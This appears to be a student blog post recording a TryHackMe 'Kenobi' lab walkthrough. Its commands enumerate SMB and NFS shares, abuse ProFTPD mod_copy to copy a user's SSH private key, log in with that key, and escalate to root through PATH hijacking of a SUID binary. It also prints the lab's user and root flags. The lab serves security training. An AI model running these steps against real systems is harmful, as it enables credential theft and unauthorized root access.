---
layout: post
title: Week 11 Lab
published: true
---
**Try Hack Me: Kenobi**
*I need all the hope I can get*
Task 1: 

I deployed the machine and used nmap to scan and see how many ports were open, there were 7.


## Task 2:

I used nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.29.248 and found 3 shares total. Guest, anonymous and print. 

I used smbclient //10.10.29.248/anonymous and just hit backspace and enter for the password which allowed me access.

After gaining access, I performed LS to list the files, and I saw log.txt.

I then used smbget -R smb://10.10.29.248/anonymous and hit enter for password. I then cat the log.txt. I saw that the port FTP was running on was 21.

Using "nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount 10.10.29.248" it showed me a mount called /var.

## Task 3:
I'm going to use NetCat to connect to the machine to the FTP port using "nc 10.10.29.248 21 which showed the version as 1.3.5

To find the exploits for a partucular software version, I used searchsploit proftpd which showed 3 exploits.

The exploit we found from ProFtpd's mod_copy modue is "searchsploit -p 36742"

I combined nfs /var directory with ProFtpd exploit and copied the id_rsa file to /var 

Then I used nc 10.10.29.248 21 and site help to list commands and copied the file using "site CPFR /home/kenobi/ .ssh/id_rsa" "site CPTO /var/tmp/id_rsa" and to mount it I used 
"mkdir mnt 
mount 10.10.29.248:/var mnt
cd mnt
ls"

"cd tmp 
ls"

"cp id_rsa <destination path>
chmod 600 id_rsa
ls -la"

Then logged in with "ssh -i id_rsa kenobi@10.10.29.248"

and found the flag after ls cat user.txt in /home/kenobi/user.txt

Flag: d0b0f3f53b6caa532a83915e19224899

## Task 4:

using find / -perm -u=s -type f 2>/dev/null, the file that looks out of the ordinary is usr/bin/menu and there are 3 options after running binary.

After running "strings /usr/bin/menu" I saw I could manupilate the path and gain access to the root.
Using "cd /tmp
echo   /bin/sh > curl
chmod 777 curl
export PATH=/tmp:$PATH" and menu then id gains access to the root privledge. The root flag is in root/root.txt so I cat the file and the root flag is: 177b3cd8562289f37382721c28381f02
